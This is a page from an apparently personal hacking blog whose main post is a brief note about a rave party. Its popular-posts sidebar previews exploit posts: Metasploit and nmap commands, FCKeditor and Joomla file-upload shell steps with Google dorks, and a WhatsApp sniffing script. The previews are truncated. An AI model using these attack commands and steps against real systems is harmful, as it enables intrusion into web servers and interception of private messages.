owlday
Home
Previous Project
About me
Event
Codes / Script
Exploit
We Love Asia!
We <3 Asia! What a night... I went "all out" during the party. Can't wait for more rave party.
Prev
Next
Powered by
Blogger
.
Sponser
Support us
Facebook
Twitter
Follow @0wlday
Tweets by @0wlday
Popular Posts
Nmap & Metasploit Exploit
nmap --script smb-check-vulns.nse -p445 <host> sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host> Scrip...
All version of FCKeditor File Upload Vulnerability.
inurl:FCKeditor/editor/ Demo: Demo1 Demo2 Demo3 1.create a htaccess file: code: SetHandler application/x-httpd-php 2.Now upload t...
php-Charts Arbitrary PHP Code Execution Vulnerability
=============================================================== Vulnerable Software: php-chart_v1.0 Official Site: http://php-...
CVE-2012-6066 Freesshd Authentication Bypass Metasploit Demo
use auxiliary/scanner/ssh/ssh_version set RHOSTS 192.168.178.22 run use exploit/windows/ssh/freesshd_authbypass set RHOST 192.168.178....
Whatsapp Sniffing
#!/usr/bin/env python import os import sys import scapy.all import re Previous_Msg = "" Previous_Filename = "" Files ...
Twitter Automation Script in Perl
#!/usr/bin/perl -s ######################################################################### # # TTYtter v2.0 (c)2007-2012 cameron kaise...
Joomla com_collecter shell upload
# Category:: web apps # Google dork: [inurl:index.php?option=com_collector] # Tested on: Windows XP ---------...
Joomla com_collector Component Arbitrary File Upload Vulnerability
Category:: web apps # Google dork: [inurl:index.php?option=com_collector] # Tested on: Windows XP --------------------------------------...
Real Madrid - Manchester United
Webspace Scheduler in Python
#! /usr/bin/python # install mechanize and BeautifulSoup var = raw_input("Enter Your Intake Code: ") import urllib, urlli...